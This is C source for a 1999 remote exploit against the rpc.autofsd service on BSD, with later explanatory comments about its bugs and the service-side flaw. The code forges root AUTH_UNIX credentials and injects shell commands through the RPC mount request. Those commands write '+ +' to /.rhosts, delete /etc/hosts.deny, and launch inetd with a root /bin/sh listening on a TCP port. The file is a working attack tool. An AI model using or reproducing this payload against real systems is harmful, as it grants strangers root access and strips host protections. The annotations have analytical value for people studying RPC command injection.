- // *** Synnergy Networks
-
- // * Description:
- //
- // Remote exploit for rpc.autofsd on BSD. This will attempt to put a root shell
- // on tcp port 530.
-
- // * Author:
- //
- // guidob (guidob@synnergy.net)
- // Synnergy Networks (c) 1999, http://www.synnergy.net
-
- // * Greets:
- //
- // Synnergy Networks, LoU, Cindy
-
- // * Comments:
- //
- // This will not work on all types and/or versions.
-
- // *** Synnergy Networks
-
- #include <sys/types.h>
- #include <sys/time.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <arpa/inet.h>
- #include <stdio.h>
- #include <unistd.h>
- #include <fcntl.h>
- #include <stdlib.h>
- #include <errno.h>
- #include <string.h>
- #include <netdb.h>
- #include <rpc/rpc.h>
- #include <rpc/xdr.h>
- #include <signal.h>
-
/* RPC identity of the service the client binds to: program number, version,
 * and the procedure number handed to clnt_call() in main(). */
#define AUTOFS_PROG ((u_long)100099)
#define AUTOFS_VERS ((u_long)1)
#define AUTOFS_MOUNT ((u_long)1)

#define AT 8            /* seconds until SIGALRM aborts the whole run (alarm(AT) in main) */
#define A_MAXNAME 255   /* xdr_string() bound used for the name and map fields */
#define A_MAXOPTS 255   /* xdr_string() bound used for the opts field */
#define A_MAXPATH 1024  /* xdr_string() bound used for the path field */
-
/* Argument record for the AUTOFS_MOUNT call, marshalled by xdr_mntrequest().
 * Every field is a NUL-terminated string; its encoded length is capped by the
 * A_MAX* limit applied in xdr_mntrequest(), not by the "[2000]" notes below,
 * which come from the original author and do not match those limits --
 * verify against the daemon's own definition before relying on either. */
struct mntrequest
{
char *name; /* name to be looked up */
char *map; /* map to use [2000]*/
char *opts; /* default options[2000]*/
char *path; /* mountpoint to use */
};
-
/* Reply record for the AUTOFS_MOUNT call, decoded by xdr_mntres(). */
struct mntres
{
int status; /* 0=OK, otherwise an errno from <sys/errno.h> */
};
-
/*
 * XDR filter for struct mntrequest.
 *
 * Encodes or decodes the four string fields in wire order (name, map, opts,
 * path), each bounded by the matching A_MAX* limit.  Stops at the first field
 * xdr_string() rejects.
 *
 * @param xdrs  XDR stream to encode into or decode from.
 * @param objp  Record whose fields are (de)serialised in place.
 * @return TRUE when all four fields were processed, FALSE otherwise.
 *
 * Note: the length limits only bound the string size on the wire; they say
 * nothing about the characters inside, which is the receiver's job to check.
 */
bool_t xdr_mntrequest(XDR *xdrs, struct mntrequest *objp)
{
    int ok = xdr_string(xdrs, &objp->name, A_MAXNAME)
          && xdr_string(xdrs, &objp->map, A_MAXNAME)
          && xdr_string(xdrs, &objp->opts, A_MAXOPTS)
          && xdr_string(xdrs, &objp->path, A_MAXPATH);
    return ok ? TRUE : FALSE;
}
/*
 * SIGALRM handler: ends the process with status 0 once alarm(AT) fires.
 *
 * Declared with no parameters, whereas signal() expects a handler taking an
 * int; registering it directly is a prototype mismatch.  Calling exit() from
 * a signal handler is also not async-signal-safe.
 */
void signal_handler(void)
{
    exit(EXIT_SUCCESS);
}
/*
 * XDR filter for struct mntres: (de)serialises the single status int.
 *
 * @param xdrs  XDR stream to encode into or decode from.
 * @param objp  Record whose status field is processed in place.
 * @return TRUE on success, FALSE if xdr_int() fails.
 */
bool_t xdr_mntres(XDR *xdrs, struct mntres *objp)
{
    return xdr_int(xdrs, &objp->status) ? TRUE : FALSE;
}
-
/*
 * Entry point.  argv[1] names the target host; it is resolved, a UDP RPC
 * client for AUTOFS_PROG/AUTOFS_VERS is created, and one AUTOFS_MOUNT call is
 * issued whose `name` field is a shell command list rather than a map key.
 * The daemon is evidently expected to hand that field to a shell unsanitised
 * (inferred from the payload below, not shown here); the service-side fix is
 * to never interpolate RPC string arguments into a command line, and to not
 * treat AUTH_UNIX credentials as proof of identity.
 *
 * Return type is implicit int (pre-C99) and nothing is returned.  argc is
 * never checked: without an argument argv[1] is NULL and inet_addr()
 * dereferences it.
 */
main(int argc, char **argv)
{

CLIENT *cl;
struct mntrequest mntreq;
struct mntres *res; /* a pointer, never allocated -- see the bzero/clnt_call notes below */
struct sockaddr_in target;
struct hostent *hp;
struct timeval tm;
char *host;
enum clnt_stat stat;


int sd;

/* signal_handler is void (void) but signal() expects void (int):
 * a prototype mismatch that happens to work on most ABIs. */
signal(SIGALRM, signal_handler);

alarm(AT); /* hard stop after AT seconds, whatever state the RPC call is in */
host=argv[1];

/* inet_addr() signals failure with INADDR_NONE (all ones); comparing the
 * unsigned s_addr against -1 relies on the implicit conversion matching it. */
if ((target.sin_addr.s_addr = inet_addr(host)) == -1)
{
if ((hp = gethostbyname(host)) == NULL)
{
printf("%s: cannot resolve\n", host);
exit(1);
}
else
/* Reads sizeof(u_long) bytes out of a 4-byte IPv4 address: fine where u_long
 * is 32 bits, an over-read on LP64.  memcpy(&target.sin_addr, hp->h_addr,
 * hp->h_length) would be the portable form. */
target.sin_addr.s_addr = *(u_long *)hp->h_addr;
}
target.sin_family=AF_INET;
target.sin_port=0; /* port 0: clntudp_create() asks the portmapper for the program's port */

sd=RPC_ANYSOCK; /* let the RPC library open the socket */
tm.tv_sec=8; /* passed to clntudp_create() as its wait (retransmit) interval */

tm.tv_usec=0;
if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL)
{
clnt_pcreateerror("clnt_create");
exit(0); /* note: exits 0 on this failure, unlike the other error paths */
}
/* AUTH_UNIX credentials are client-asserted: the uid 0 / gid 0 here are
 * simply claimed, never verified by the transport.  A service that grants
 * privilege on AUTH_UNIX alone trusts whatever the caller writes here. */
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
tm.tv_sec = 25; /* per-call timeout for clnt_call() below */

/* echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob
*/
/* Command-injection payload: `name` starts with ';' and carries shell
 * commands instead of a lookup key.  The other three fields are filler. */
mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo \"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd /tmp/bob"; /* anything can be inserted here (translated from the Polish original) */
mntreq.map="/bin/true";
mntreq.path="/hosts";
mntreq.opts="";
/* res is a pointer, so this zeroes sizeof(struct mntres *) bytes of the
 * pointer variable itself, not a struct mntres. */
bzero((char *)&res, sizeof(res));

/* &res is a struct mntres **, while xdr_mntres() decodes into a
 * struct mntres *: the reply's status int is written over the bytes of the
 * pointer variable.  Nothing reads res afterwards, so it is harmless here,
 * but the intended form is `struct mntres res;` with `&res`. */
if ((stat = clnt_call(cl, AUTOFS_MOUNT, (xdrproc_t)xdr_mntrequest,&mntreq,
(xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS)
{
clnt_perror(cl, "clnt_call");
exit(1);
}

clnt_destroy(cl); /* auth_destroy() is never called on cl->cl_auth; no return value is produced */
}
-
- // EOF
-